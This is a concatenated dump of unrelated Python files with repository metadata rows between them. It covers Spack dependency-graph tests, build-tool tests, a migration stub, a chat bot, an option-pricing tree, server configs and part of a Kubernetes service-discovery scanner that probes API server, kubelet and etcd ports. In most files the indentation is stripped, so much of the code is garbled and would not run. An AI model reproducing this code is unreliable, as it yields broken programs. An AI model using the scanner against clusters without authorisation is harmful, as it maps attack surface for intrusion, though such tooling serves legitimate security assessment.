'libdwarf': {libelf: None},
libelf: None
},
mpich: None
},
mpich: None
},
})
# Similar to normalized spec, but now with copies of the same
# libelf node. Normalization should result in a single unique
# node for each package, so this is the wrong DAG.
non_unique_nodes = Spec.from_literal({
'mpileaks': {
'callpath': {
'dyninst': {
'libdwarf': {'libelf@1.8.11': None},
'libelf@1.8.11': None
},
mpich: None
},
mpich: None
}
}, normal=False)
        # Smoke test: each spec compares equal to itself and str() works on it
specs = (spec, expected_flat, expected_normalized, non_unique_nodes)
for lhs, rhs in zip(specs, specs):
assert lhs == rhs
assert str(lhs) == str(rhs)
# Test that equal and equal_dag are doing the right thing
assert spec == expected_flat
assert spec.eq_dag(expected_flat)
# Normalized has different DAG structure, so NOT equal.
assert spec != expected_normalized
assert not spec.eq_dag(expected_normalized)
# Again, different DAG structure so not equal.
assert spec != non_unique_nodes
assert not spec.eq_dag(non_unique_nodes)
spec.normalize()
        # After normalizing, the spec should match the normalized DAG, not the flat one.
assert spec != expected_flat
assert not spec.eq_dag(expected_flat)
# verify DAG structure without deptypes.
assert spec.eq_dag(expected_normalized, deptypes=False)
assert not spec.eq_dag(non_unique_nodes, deptypes=False)
assert not spec.eq_dag(expected_normalized, deptypes=True)
assert not spec.eq_dag(non_unique_nodes, deptypes=True)
def test_normalize_with_virtual_package(self):
spec = Spec('mpileaks ^mpi ^libelf@1.8.11 ^libdwarf')
spec.normalize()
expected_normalized = Spec.from_literal({
'mpileaks': {
'callpath': {
'dyninst': {
'libdwarf': {'libelf@1.8.11': None},
'libelf@1.8.11': None
},
'mpi': None
},
'mpi': None
}
})
assert str(spec) == str(expected_normalized)
def test_contains(self):
spec = Spec('mpileaks ^mpi ^libelf@1.8.11 ^libdwarf')
assert Spec('mpi') in spec
assert Spec('libelf') in spec
assert Spec('libelf@1.8.11') in spec
assert Spec('libelf@1.8.12') not in spec
assert Spec('libdwarf') in spec
assert Spec('libgoblin') not in spec
assert Spec('mpileaks') in spec
def test_copy_simple(self):
orig = Spec('mpileaks')
copy = orig.copy()
check_links(copy)
assert orig == copy
assert orig.eq_dag(copy)
assert orig._normal == copy._normal
assert orig._concrete == copy._concrete
# ensure no shared nodes bt/w orig and copy.
orig_ids = set(id(s) for s in orig.traverse())
copy_ids = set(id(s) for s in copy.traverse())
assert not orig_ids.intersection(copy_ids)
def test_copy_normalized(self):
orig = Spec('mpileaks')
orig.normalize()
copy = orig.copy()
check_links(copy)
assert orig == copy
assert orig.eq_dag(copy)
assert orig._normal == copy._normal
assert orig._concrete == copy._concrete
# ensure no shared nodes bt/w orig and copy.
orig_ids = set(id(s) for s in orig.traverse())
copy_ids = set(id(s) for s in copy.traverse())
assert not orig_ids.intersection(copy_ids)
def test_copy_concretized(self):
orig = Spec('mpileaks')
orig.concretize()
copy = orig.copy()
check_links(copy)
assert orig == copy
assert orig.eq_dag(copy)
assert orig._normal == copy._normal
assert orig._concrete == copy._concrete
# ensure no shared nodes bt/w orig and copy.
orig_ids = set(id(s) for s in orig.traverse())
copy_ids = set(id(s) for s in copy.traverse())
assert not orig_ids.intersection(copy_ids)
"""
Here is the graph with deptypes labeled (assume all packages have a 'dt'
prefix). Arrows are marked with the deptypes ('b' for 'build', 'l' for
'link', 'r' for 'run').
use -bl-> top
top -b-> build1
top -bl-> link1
top -r-> run1
build1 -b-> build2
build1 -bl-> link2
build1 -r-> run2
link1 -bl-> link3
run1 -bl-> link5
run1 -r-> run3
link3 -b-> build2
link3 -bl-> link4
run3 -b-> build3
"""
def test_deptype_traversal(self):
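        # Why the expected list below excludes the dtrun*/dtlink5/dtbuild3 nodes:
        # a ('build', 'link') traversal can only cross the -b-> and -bl-> edges
        # in the graph sketched above, so any node reachable only through an
        # -r-> edge (dtrun1, dtrun2, dtrun3, dtlink5, dtbuild3) never appears.
        # Illustrative sketch of the call under test (mirrors the code below):
        #     dag = Spec('dtuse'); dag.normalize()
        #     [s.name for s in dag.traverse(deptype=('build', 'link'))]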
dag = Spec('dtuse')
dag.normalize()
names = ['dtuse', 'dttop', 'dtbuild1', 'dtbuild2', 'dtlink2',
'dtlink1', 'dtlink3', 'dtlink4']
traversal = dag.traverse(deptype=('build', 'link'))
assert [x.name for x in traversal] == names
def test_deptype_traversal_with_builddeps(self):
dag = Spec('dttop')
dag.normalize()
names = ['dttop', 'dtbuild1', 'dtbuild2', 'dtlink2',
'dtlink1', 'dtlink3', 'dtlink4']
traversal = dag.traverse(deptype=('build', 'link'))
assert [x.name for x in traversal] == names
def test_deptype_traversal_full(self):
dag = Spec('dttop')
dag.normalize()
names = ['dttop', 'dtbuild1', 'dtbuild2', 'dtlink2', 'dtrun2',
'dtlink1', 'dtlink3', 'dtlink4', 'dtrun1', 'dtlink5',
'dtrun3', 'dtbuild3']
traversal = dag.traverse(deptype=all)
assert [x.name for x in traversal] == names
def test_deptype_traversal_run(self):
dag = Spec('dttop')
dag.normalize()
names = ['dttop', 'dtrun1', 'dtrun3']
traversal = dag.traverse(deptype='run')
assert [x.name for x in traversal] == names
def test_hash_bits(self):
"""Ensure getting first n bits of a base32-encoded DAG hash works."""
# RFC 4648 base32 decode table
b32 = dict((j, i) for i, j in enumerate('abcdefghijklmnopqrstuvwxyz'))
b32.update(dict((j, i) for i, j in enumerate('234567', 26)))
# some package hashes
tests = [
'35orsd4cenv743hg4i5vxha2lzayycby',
'6kfqtj7dap3773rxog6kkmoweix5gpwo',
'e6h6ff3uvmjbq3azik2ckr6ckwm3depv',
'snz2juf4ij7sv77cq3vs467q6acftmur',
'4eg47oedi5bbkhpoxw26v3oe6vamkfd7',
'vrwabwj6umeb5vjw6flx2rnft3j457rw']
for test_hash in tests:
# string containing raw bits of hash ('1' and '0')
expected = ''.join([format(b32[c], '#07b').replace('0b', '')
for c in test_hash])
for bits in (1, 2, 3, 4, 7, 8, 9, 16, 64, 117, 128, 160):
actual_int = hashutil.base32_prefix_bits(test_hash, bits)
fmt = "#0%sb" % (bits + 2)
actual = format(actual_int, fmt).replace('0b', '')
assert expected[:bits] == actual
with pytest.raises(ValueError):
hashutil.base32_prefix_bits(test_hash, 161)
with pytest.raises(ValueError):
hashutil.base32_prefix_bits(test_hash, 256)
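        # Worked example (sketch) of the bit expansion above: for the first test
        # hash, '3' -> 27 -> '11011' and '5' -> 29 -> '11101', so its first 8 bits
        # are '11011111' and hashutil.base32_prefix_bits(tests[0], 8) yields 223.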
def test_traversal_directions(self):
"""Make sure child and parent traversals of specs work."""
# Mock spec - d is used for a diamond dependency
spec = Spec.from_literal({
'a': {
'b': {
'c': {'d': None},
'e': None
},
'f': {
'g': {'d': None}
}
}
})
assert (
['a', 'b', 'c', 'd', 'e', 'f', 'g'] ==
[s.name for s in spec.traverse(direction='children')])
assert (
['g', 'f', 'a'] ==
[s.name for s in spec['g'].traverse(direction='parents')])
assert (
['d', 'c', 'b', 'a', 'g', 'f'] ==
[s.name for s in spec['d'].traverse(direction='parents')])
def test_edge_traversals(self):
"""Make sure child and parent traversals of specs work."""
# Mock spec - d is used for a diamond dependency
spec = Spec.from_literal({
'a': {
'b': {
'c': {'d': None},
'e': None
},
'f': {
'g': {'d': None}
}
}
})
assert (
['a', 'b', 'c', 'd', 'e', 'f', 'g'] ==
[s.name for s in spec.traverse(direction='children')])
assert (
['g', 'f', 'a'] ==
[s.name for s in spec['g'].traverse(direction='parents')])
assert (
['d', 'c', 'b', 'a', 'g', 'f'] ==
[s.name for s in spec['d'].traverse(direction='parents')])
def test_copy_dependencies(self):
s1 = Spec('mpileaks ^mpich2@1.1')
s2 = s1.copy()
assert '^mpich2@1.1' in s2
assert '^mpich2' in s2
def test_construct_spec_with_deptypes(self):
"""Ensure that it is possible to construct a spec with explicit
dependency types."""
s = Spec.from_literal({
'a': {
'b': {'c:build': None},
'd': {
'e:build,link': {'f:run': None}
}
}
})
        assert s['b']._dependencies['c'].deptypes == ('build',)
        assert s['d']._dependencies['e'].deptypes == ('build', 'link')
        assert s['e']._dependencies['f'].deptypes == ('run',)
        assert s['c']._dependents['b'].deptypes == ('build',)
        assert s['e']._dependents['d'].deptypes == ('build', 'link')
        assert s['f']._dependents['e'].deptypes == ('run',)
def check_diamond_deptypes(self, spec):
"""Validate deptypes in dt-diamond spec.
This ensures that concretization works properly when two packages
depend on the same dependency in different ways.
"""
assert spec['dt-diamond']._dependencies[
'dt-diamond-left'].deptypes == ('build', 'link')
assert spec['dt-diamond']._dependencies[
'dt-diamond-right'].deptypes == ('build', 'link')
assert spec['dt-diamond-left']._dependencies[
'dt-diamond-bottom'].deptypes == ('build',)
        assert spec['dt-diamond-right']._dependencies[
'dt-diamond-bottom'].deptypes == ('build', 'link', 'run')
def check_diamond_normalized_dag(self, spec):
dag = Spec.from_literal({
'dt-diamond': {
'dt-diamond-left:build,link': {
'dt-diamond-bottom:build': None
},
'dt-diamond-right:build,link': {
'dt-diamond-bottom:build,link,run': None
},
}
})
assert spec.eq_dag(dag)
def test_normalize_diamond_deptypes(self):
"""Ensure that dependency types are preserved even if the same thing is
depended on in two different ways."""
s = Spec('dt-diamond')
s.normalize()
self.check_diamond_deptypes(s)
self.check_diamond_normalized_dag(s)
def test_concretize_deptypes(self):
"""Ensure that dependency types are preserved after concretization."""
s = Spec('dt-diamond')
s.concretize()
self.check_diamond_deptypes(s)
def test_copy_deptypes(self):
"""Ensure that dependency types are preserved by spec copy."""
s1 = Spec('dt-diamond')
s1.normalize()
self.check_diamond_deptypes(s1)
self.check_diamond_normalized_dag(s1)
s2 = s1.copy()
self.check_diamond_normalized_dag(s2)
self.check_diamond_deptypes(s2)
s3 = Spec('dt-diamond')
s3.concretize()
self.check_diamond_deptypes(s3)
s4 = s3.copy()
self.check_diamond_deptypes(s4)
def test_getitem_query(self):
s = Spec('mpileaks')
s.concretize()
# Check a query to a non-virtual package
a = s['callpath']
query = a.last_query
assert query.name == 'callpath'
assert len(query.extra_parameters) == 0
assert not query.isvirtual
# Check a query to a virtual package
a = s['mpi']
query = a.last_query
assert query.name == 'mpi'
assert len(query.extra_parameters) == 0
assert query.isvirtual
# Check a query to a virtual package with
# extra parameters after query
a = s['mpi:cxx,fortran']
query = a.last_query
assert query.name == 'mpi'
assert len(query.extra_parameters) == 2
assert 'cxx' in query.extra_parameters
assert 'fortran' in query.extra_parameters
assert query.isvirtual
def test_getitem_exceptional_paths(self):
s = Spec('mpileaks')
s.concretize()
# Needed to get a proxy object
q = s['mpileaks']
# Test that the attribute is read-only
with pytest.raises(AttributeError):
q.libs = 'foo'
with pytest.raises(AttributeError):
q.libs
def test_canonical_deptype(self):
# special values
assert canonical_deptype(all) == all_deptypes
assert canonical_deptype('all') == all_deptypes
with pytest.raises(ValueError):
canonical_deptype(None)
with pytest.raises(ValueError):
canonical_deptype([None])
# everything in all_deptypes is canonical
for v in all_deptypes:
assert canonical_deptype(v) == (v,)
# tuples
assert canonical_deptype(('build',)) == ('build',)
assert canonical_deptype(
('build', 'link', 'run')) == ('build', 'link', 'run')
assert canonical_deptype(
('build', 'link')) == ('build', 'link')
assert canonical_deptype(
('build', 'run')) == ('build', 'run')
# lists
assert canonical_deptype(
['build', 'link', 'run']) == ('build', 'link', 'run')
assert canonical_deptype(
['build', 'link']) == ('build', 'link')
assert canonical_deptype(
['build', 'run']) == ('build', 'run')
# sorting
assert canonical_deptype(
('run', 'build', 'link')) == ('build', 'link', 'run')
assert canonical_deptype(
('run', 'link', 'build')) == ('build', 'link', 'run')
assert canonical_deptype(
('run', 'link')) == ('link', 'run')
assert canonical_deptype(
('link', 'build')) == ('build', 'link')
# can't put 'all' in tuple or list
with pytest.raises(ValueError):
canonical_deptype(['all'])
with pytest.raises(ValueError):
canonical_deptype(('all',))
# invalid values
with pytest.raises(ValueError):
canonical_deptype('foo')
with pytest.raises(ValueError):
canonical_deptype(('foo', 'bar'))
with pytest.raises(ValueError):
canonical_deptype(('foo',))
def test_invalid_literal_spec(self):
# Can't give type 'build' to a top-level spec
with pytest.raises(spack.spec.SpecParseError):
Spec.from_literal({'foo:build': None})
# Can't use more than one ':' separator
with pytest.raises(KeyError):
Spec.from_literal({'foo': {'bar:build:link': None}})
| 33.218053
| 79
| 0.560285
|
66beedf769e23a8e57a034298ae78269da972e67
| 988
|
py
|
Python
|
tests/test_unit/test_add.py
|
kvg/pydm
|
6e2994e169db63d69b61686301b6fcd8f04f4010
|
[
"MIT"
] | null | null | null |
tests/test_unit/test_add.py
|
kvg/pydm
|
6e2994e169db63d69b61686301b6fcd8f04f4010
|
[
"MIT"
] | 5
|
2017-06-29T11:38:17.000Z
|
2020-03-31T00:29:49.000Z
|
tests/test_unit/test_add.py
|
kvg/pydm
|
6e2994e169db63d69b61686301b6fcd8f04f4010
|
[
"MIT"
] | 1
|
2017-06-14T15:39:07.000Z
|
2017-06-14T15:39:07.000Z
|
import io
import pytest
from dmpy import DistributedMake
class TestDmpyAdd(object):
def test_raises_on_adding_same_target_twice(self):
# given
dm = DistributedMake()
dm.add('hi', 'world', 'echo')
# when
with pytest.raises(Exception) as excinfo:
dm.add('hi', 'world', 'echo')
assert 'Tried to add target twice' in str(excinfo.value)
def test_raises_on_adding_none_target(self):
# given
dm = DistributedMake()
# when
with pytest.raises(ValueError) as excinfo:
dm.add(None, 'world', 'echo')
# then
assert 'target may not be None type' in str(excinfo.value)
def test_raises_on_adding_none_deps(self):
# given
dm = DistributedMake()
# when
with pytest.raises(ValueError) as excinfo:
dm.add('hi', ['world', None], 'echo')
# then
assert 'deps may not include None type' in str(excinfo.value)
| 24.7
| 69
| 0.59919
|
a26652b904fa5c4560333d60b91c7846479825fc
| 341
|
py
|
Python
|
migrations/versions/90a9015b6406_new.py
|
syth0le/async_cookeat
|
0cecdd44c064be6fe19c0d0ae8342d7baf5a9bb8
|
[
"CC0-1.0"
] | null | null | null |
migrations/versions/90a9015b6406_new.py
|
syth0le/async_cookeat
|
0cecdd44c064be6fe19c0d0ae8342d7baf5a9bb8
|
[
"CC0-1.0"
] | null | null | null |
migrations/versions/90a9015b6406_new.py
|
syth0le/async_cookeat
|
0cecdd44c064be6fe19c0d0ae8342d7baf5a9bb8
|
[
"CC0-1.0"
] | null | null | null |
"""new
Revision ID: 90a9015b6406
Revises: 494340202f18
Create Date: 2021-08-23 15:09:14.459946
"""
from alembic import op
import sqlalchemy as sa
# revision identifiers, used by Alembic.
revision = '90a9015b6406'
down_revision = '494340202f18'
branch_labels = None
depends_on = None
def upgrade():
pass
def downgrade():
pass
| 13.64
| 40
| 0.73607
|
1eecadc662169e9ca11c8d3ae2b0aa084a2f2c23
| 679
|
py
|
Python
|
test.py
|
avrogachev/vk_quest_bot
|
9728d600302db514f1c71784b3b67804994cc46a
|
[
"MIT"
] | 3
|
2019-10-01T13:52:07.000Z
|
2020-09-07T17:39:02.000Z
|
test.py
|
avrogachev/vk_quest_bot
|
9728d600302db514f1c71784b3b67804994cc46a
|
[
"MIT"
] | 1
|
2019-10-01T13:55:53.000Z
|
2019-10-01T14:19:50.000Z
|
test.py
|
avrogachev/vk_quest_bot
|
9728d600302db514f1c71784b3b67804994cc46a
|
[
"MIT"
] | null | null | null |
from vk import VK
from vk.utils import TaskManager
from vk.bot_framework import Dispatcher, rules
from vk.bot_framework import BaseRule, BaseMiddleware
from vk import types
import logging
from config import TOKEN, GROUP_ID # PLUGINS_PATH #, loop
from keyboards import *
logging.basicConfig(level="DEBUG")
vk = VK(TOKEN)
gid = GROUP_ID
task_manager = TaskManager(vk.loop)
api = vk.get_api()
dp = Dispatcher(vk, gid)
@dp.message_handler(rules.Command("start"))
async def handle(message: types.Message, data: dict):
await message.reply("Hello!")
async def run():
dp.run_polling()
if __name__ == "__main__":
task_manager.add_task(run)
task_manager.run()
| 19.4
| 58
| 0.745214
|
ac5ca927faeafec46fcd049695ea34fd4119c30a
| 3,516
|
py
|
Python
|
esovalue/trinomial_tree.py
|
snthibaud/esovalue
|
9d0ed07a85e58637c17fd595c63ebf4fb0d4ac22
|
[
"MIT"
] | 2
|
2022-01-26T19:56:30.000Z
|
2022-02-09T01:20:22.000Z
|
esovalue/trinomial_tree.py
|
snthibaud/esovalue
|
9d0ed07a85e58637c17fd595c63ebf4fb0d4ac22
|
[
"MIT"
] | null | null | null |
esovalue/trinomial_tree.py
|
snthibaud/esovalue
|
9d0ed07a85e58637c17fd595c63ebf4fb0d4ac22
|
[
"MIT"
] | null | null | null |
from dataclasses import dataclass
from typing import Optional
from mpmath import mpf, ln, mp
ONE = mpf("1")
ZERO = mpf("0")
@dataclass
class TrinomialNode:
stock_value: Optional[mpf] = None
option_value: Optional[mpf] = None
up: Optional['TrinomialNode'] = None
middle: Optional['TrinomialNode'] = None
down: Optional['TrinomialNode'] = None
def get_trinomial_tree(depth: int) -> TrinomialNode:
assert depth > 0
lattice = [[TrinomialNode()]]
for level in range(1, depth):
lattice.append([TrinomialNode() for _ in range(-level, level+1)])
for i in range(0, len(lattice)-1):
width = len(lattice[i])
for j in range(0, width):
lattice[i][j].down = lattice[i+1][j]
lattice[i][j].middle = lattice[i+1][j+1]
lattice[i][j].up = lattice[i+1][j+2]
return lattice[0][0]
def set_stock_prices(s0: mpf, u: mpf, root: TrinomialNode):
q = [(s0, root, True, True)]
while q:
s, n, h, l = q.pop()
if n is not None:
n.stock_value = s
if h:
q.append((s*u, n.up, True, False))
if l:
q.append((s/u, n.down, False, True))
q.append((s, n.middle, False, False))
def present_value(fv: mpf, dt: mpf, r: mpf):
"""
Calculate present value
:param fv: Future value
:param dt: Time difference (in years)
:param r: Risk-free interest rate
:return: Present value
"""
return mp.e**(-r*dt)*fv
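# Worked example (illustrative numbers, not from the original module): with
# r = 0.05 and dt = 1 year,
# present_value(mpf("105"), mpf("1"), mpf("0.05")) = 105 * e**-0.05, roughly 99.88.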
def calculate_eso_prices(root: TrinomialNode, k: mpf, dt: mpf, s: mpf, r: mpf, q: mpf, er: mpf, v: mpf,
m: Optional[mpf]):
"""
Calculate the price of an employee stock option over time
:param root: Root node
:param k: Strike price
:param dt: Length of one time step (in years)
:param s: Volatility (standard deviation)
:param r: Risk-free interest rate
:param q: Dividend rate
:param er: Employee exit rate (over a year)
:param v: Vesting period (in years)
:param m: Multiplier for early exercise
"""
level = [root]
levels = [level]
while level:
children = []
for i, n in enumerate(level):
middle_child = n.middle
if middle_child:
if i == 0:
children.append(n.down)
children.append(middle_child)
if i + 1 == len(level):
children.append(n.up)
else:
break
level = children
if level:
levels.append(level)
leaves = levels[-1]
total_steps = len(levels)
for n in leaves:
n.option_value = max(ZERO, n.stock_value - k) if (total_steps-1)*dt >= v else ZERO
for i in range(len(levels)-2, -1, -1):
for node in levels[i]:
vested = i * dt >= v
if vested and m and node.stock_value >= k*m:
node.option_value = node.stock_value - k
else:
a = mp.sqrt(dt/(12*s**2))*(r-q-s**2/2) if s > ZERO else ZERO
b = ONE/6
pd = -a + b
pm = 4*b
pu = a + b
er_dt = ln(ONE+er)*dt
option_value = (ONE-er_dt)*present_value(
pd*node.down.option_value + pm*node.middle.option_value + pu*node.up.option_value, dt, r)
if vested:
option_value += er_dt*max(node.stock_value-k, ZERO)
node.option_value = option_value
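# Hedged usage sketch (not part of the original module): the numbers below are
# illustrative assumptions, chosen only to show how the three helpers compose.
if __name__ == "__main__":
    root = get_trinomial_tree(depth=4)                    # small lattice
    set_stock_prices(mpf("100"), mpf("1.1"), root)        # s0 = 100, up factor u = 1.1
    calculate_eso_prices(root, k=mpf("100"), dt=mpf("0.25"), s=mpf("0.2"),
                         r=mpf("0.03"), q=mpf("0"), er=mpf("0.05"),
                         v=mpf("0.5"), m=mpf("2"))
    print(root.option_value)                              # ESO value at the root node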
| 32.555556
| 109
| 0.544653
|
b474eb138f09a6b6fea0f45964a8f8a77732ea10
| 449
|
py
|
Python
|
gunicorn.conf.py
|
richardzilincikPantheon/bottle-yang-extractor-validator
|
12cb99bf8b0bde2d14c351695c4ad4b1a0665dd8
|
[
"BSD-2-Clause"
] | 4
|
2019-06-15T03:11:41.000Z
|
2021-06-29T05:34:59.000Z
|
gunicorn.conf.py
|
richardzilincikPantheon/bottle-yang-extractor-validator
|
12cb99bf8b0bde2d14c351695c4ad4b1a0665dd8
|
[
"BSD-2-Clause"
] | 39
|
2019-07-08T06:58:26.000Z
|
2021-10-06T11:39:25.000Z
|
gunicorn.conf.py
|
richardzilincikPantheon/bottle-yang-extractor-validator
|
12cb99bf8b0bde2d14c351695c4ad4b1a0665dd8
|
[
"BSD-2-Clause"
] | 7
|
2019-09-18T15:08:26.000Z
|
2021-12-12T13:56:05.000Z
|
bind = "unix:/var/run/yang/yangvalidator.sock"
#umask = os.umask('007')
workers = 2
max_requests = 1000
timeout = 300
keep_alive = 2
#user = 'yang'
#group = 'yang'
preload = True
accesslog = '/var/yang/logs/uwsgi/yang-validator-access.log'
errorlog = '/var/yang/logs/uwsgi/yang-validator-error.log'
loglevel = 'debug'
#change log format
access_log_format = '%(h)s %(l)s %(u)s %(t)s "%(r)s" %(s)s %(b)s "%(f)s" "%(a)s"'
worker_class = 'gevent'
| 20.409091
| 81
| 0.659243
|
85ee568b42aee238842cd9390f9b1e00e31982db
| 284
|
py
|
Python
|
ExampleSlice/learnSlice.py
|
subash-kc/2022-01-04-Python
|
5ce51e4265bcd860a4e62423edef6ec9cd1437b4
|
[
"MIT"
] | 1
|
2022-01-14T18:03:42.000Z
|
2022-01-14T18:03:42.000Z
|
ExampleSlice/learnSlice.py
|
subash-kc/2022-01-04-Python
|
5ce51e4265bcd860a4e62423edef6ec9cd1437b4
|
[
"MIT"
] | null | null | null |
ExampleSlice/learnSlice.py
|
subash-kc/2022-01-04-Python
|
5ce51e4265bcd860a4e62423edef6ec9cd1437b4
|
[
"MIT"
] | null | null | null |
website1 = "http://localhost:3000"
slice_local = slice(7, -5)
print(website1[slice_local])
website2 = "http://google.com"
slice_google = slice(7, -4)
print(website2[slice_google])
website3 = "http://wikipedia.com"
slice_wikipedia = slice(7, -4)
print(website3[slice_wikipedia])
| 17.75
| 34
| 0.725352
|
1fce3e6dc5debe0080aaa3f193f2a363f6d04946
| 126
|
py
|
Python
|
ktrain/__init__.py
|
sathishksankarpandi/ktrain
|
bc9169661592ee14b95d9e56622dbb20e66b3568
|
[
"MIT"
] | null | null | null |
ktrain/__init__.py
|
sathishksankarpandi/ktrain
|
bc9169661592ee14b95d9e56622dbb20e66b3568
|
[
"MIT"
] | null | null | null |
ktrain/__init__.py
|
sathishksankarpandi/ktrain
|
bc9169661592ee14b95d9e56622dbb20e66b3568
|
[
"MIT"
] | null | null | null |
from .version import __version__
from .core import *
__all__ = ['get_learner', 'ArrayTrainer', 'GenTrainer', 'get_predictor']
| 31.5
| 72
| 0.753968
|
ad8be1c431eeb77cea57975f7f209ce38fa477f6
| 635
|
py
|
Python
|
client/data/electricity_master_lookup_to_json.py
|
yangsiyu007/event-footprint
|
5e629ae69822c666f70edeb71de2d3dea3eda4ba
|
[
"MIT"
] | null | null | null |
client/data/electricity_master_lookup_to_json.py
|
yangsiyu007/event-footprint
|
5e629ae69822c666f70edeb71de2d3dea3eda4ba
|
[
"MIT"
] | 2
|
2021-05-11T08:34:11.000Z
|
2022-02-18T23:50:43.000Z
|
client/data/electricity_master_lookup_to_json.py
|
yangsiyu007/event-footprint
|
5e629ae69822c666f70edeb71de2d3dea3eda4ba
|
[
"MIT"
] | null | null | null |
"""
Convert a CSV version of the Electricity Master Lookup table to a JSON
"""
import json
import pandas as pd
with open('electricity_master_lookup.csv') as f:
csv_table = pd.read_csv(f, header=0)
print(csv_table.head(5))
json_table = {} # "Electric Subregion" to "t CO2e / kWh"
for i, row in csv_table.iterrows():
json_table[row['Electric Subregion']] = row['t CO2e / kWh']
assert json_table['United States - NWPP'] == 0.0002972
print(f'In JSON table, United States - NWPP is {json_table["United States - NWPP"]}')
with open('../src/electricity_master_lookup.json', 'w') as f:
json.dump(json_table, f, indent=2)
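# The emitted file is a flat {"<Electric Subregion>": <t CO2e / kWh>} mapping,
# e.g. {"United States - NWPP": 0.0002972, ...}; only the NWPP figure is
# asserted above, the other entries depend on the CSV contents.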
| 25.4
| 85
| 0.699213
|
f198f6397c37e45f536281c27bdd9f5a88f06e94
| 10,263
|
py
|
Python
|
kubestrike/service_discovery.py
|
tpoindessous/kubestrike
|
7fb3a80d1f961b974e0f9360399185ab7b7f1fcf
|
[
"MIT"
] | 1
|
2021-08-03T10:12:13.000Z
|
2021-08-03T10:12:13.000Z
|
kubestrike/service_discovery.py
|
tpoindessous/kubestrike
|
7fb3a80d1f961b974e0f9360399185ab7b7f1fcf
|
[
"MIT"
] | 3
|
2021-11-14T14:41:24.000Z
|
2021-11-14T16:03:54.000Z
|
kubestrike/service_discovery.py
|
tpoindessous/kubestrike
|
7fb3a80d1f961b974e0f9360399185ab7b7f1fcf
|
[
"MIT"
] | null | null | null |
import socket
import warnings
from kubestrike.bars import prefix, sub_prefix, service_open, print_msg_box
warnings.filterwarnings("ignore")
class ServiceDiscovery(object):
def __init__(self,file_object):
self.result = {}
self.service_discovery_status = []
self.file_obj = file_object
    def port_scan(self, host, port):
        sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
        sock.settimeout(1)
        try:
            # connect_ex returns 0 when the TCP connection succeeds
            result = sock.connect_ex((host, port))
        finally:
            sock.close()
        return result == 0
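    # Illustrative call (host and port are assumptions, not real defaults):
    # self.port_scan('10.0.0.5', 6443) -> True only if a TCP connect succeeds
    # within the 1 second timeout.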
@prefix('[+] Performing Service Discovery.................................................')
def service_result(self, ip, port=None):
print("Performing Service Discovery on host {host}..........".format(host=str(ip)),file=self.file_obj)
self.apiserver_secure(ip, port)
self.apiserver_insecure(ip)
self.kubelet_rw(ip)
self.kubelet_ro(ip)
self.kubecontroller(ip)
self.etcd_client(ip)
self.etcd_server(ip)
self.kubeproxy_healthcheck(ip)
self.scheduler(ip)
self.kubeproxy(ip)
self.important_ports(ip)
self.dashboard(ip)
self.service_discovery_results_status()
@prefix('[+] KubeServer Secure Identified Services ........................................')
def service_discovery_results_status(self):
print('\n', file=self.file_obj)
print("KubeServer Secure Identified Services ........................................",file=self.file_obj)
service_discovery_status = self.service_discovery_status
for status in service_discovery_status:
service_open(status,self.file_obj)
print('\n',file=self.file_obj)
print_msg_box('######## Below mentioned are the valid urls of the identified Endpoints ########', file_obj=self.file_obj)
for service, status in self.result.items():
if status.get('active') == True:
end_point = status.get('end_point')
print(" --> {service} identified {end_point}".format(service=service,end_point=end_point),file=self.file_obj)
@sub_prefix(' [+] Scanning for KubeServer Secure Service................................')
def apiserver_secure(self, host, port=None):
print(" [+] Scanning for KubeServer Secure Service................................",file=self.file_obj)
ports = [443, 6443, 8443]
apiserver_secure = False
end_point = None
if port:
ports.append(int(port))
for port in ports:
p_res = self.port_scan(host, port)
if p_res:
apiserver_secure = True
end_point = host + ':' + str(port)
self.service_discovery_status.append('KubeServer Secure')
break
self.result.update({'apiserver_secure': {'active': apiserver_secure, 'end_point': end_point}})
@sub_prefix(' [+] Scanning for KubeServer Insecure Service..............................')
def apiserver_insecure(self, host):
print(" [+] Scanning for KubeServer Insecure Service..............................", file=self.file_obj)
apiserver_insecure = False
end_point = None
port = 8080
p_res = self.port_scan(host, port)
if p_res:
apiserver_insecure = True
end_point = host + ':' + str(port)
self.service_discovery_status.append('KubeServer Insecure Service')
self.result.update({'apiserver_insecure': {'active': apiserver_insecure, 'end_point': end_point}})
@sub_prefix(' [+] Scanning for Kubelet ReadWrite Service................................')
def kubelet_rw(self, host):
print(" [+] Scanning for Kubelet ReadWrite Service................................", file=self.file_obj)
kubelet_rw = False
end_point = None
port = 10250
p_res = self.port_scan(host, port)
if p_res:
kubelet_rw = True
end_point = host + ':' + str(port)
self.service_discovery_status.append('Kubelet ReadWrite Service')
self.result.update({'kubelet_rw': {'active': kubelet_rw, 'end_point': end_point}})
@sub_prefix(' [+] Scanning for kubecontroller Service...................................')
def kubecontroller(self, host):
print(" [+] Scanning for kubecontroller Service................................", file=self.file_obj)
kubecontroller = False
end_point = None
port = 10257
p_res = self.port_scan(host, port)
if p_res:
kubecontroller = True
end_point = host + ':' + str(port)
self.service_discovery_status.append('Kubecontroller Service')
self.result.update({'kubecontroller': {'active': kubecontroller, 'end_point': end_point}})
@sub_prefix(' [+] Scanning for Kubelet Readonly Service.................................')
def kubelet_ro(self, host):
print(" [+] Scanning for Kubelet Readonly Service.................................", file=self.file_obj)
kubelet_ro = False
end_point = None
port = 10255
p_res = self.port_scan(host, port)
if p_res:
kubelet_ro = True
end_point = host + ':' + str(port)
self.service_discovery_status.append('Kubelet Readonly Service')
self.result.update({'kubelet_ro': {'active': kubelet_ro, 'end_point': end_point}})
@sub_prefix(' [+] Scanning for ETCD Client..............................................')
def etcd_client(self, host):
print(" [+] Scanning for ETCD Client..............................................", file=self.file_obj)
etcd_client = False
end_point = None
port = 2379
p_res = self.port_scan(host, port)
if p_res:
etcd_client = True
end_point = host + ':' + str(port)
self.service_discovery_status.append('ETCD Client')
self.result.update({'etcd_client': {'active': etcd_client, 'end_point': end_point}})
@sub_prefix(' [+] Scanning for ETCD Server..............................................')
def etcd_server(self, host):
print(" [+] Scanning for ETCD Server..............................................", file=self.file_obj)
etcd_server = False
end_point = None
port = 2380
p_res = self.port_scan(host, port)
if p_res:
etcd_server = True
end_point = host + ':' + str(port)
self.service_discovery_status.append('ETCD Server')
self.result.update({'etcd_server': {'active': etcd_server, 'end_point': end_point}})
@sub_prefix(' [+] Scanning for Kube proxy Healthcheck...................................')
def kubeproxy_healthcheck(self, host):
print(" [+] Scanning for Kube proxy Healthcheck...................................", file=self.file_obj)
kubeproxy_healthcheck = False
end_point = None
ports = [10256, 10257, 10249]
for port in ports:
p_res = self.port_scan(host, port)
if p_res:
kubeproxy_healthcheck = True
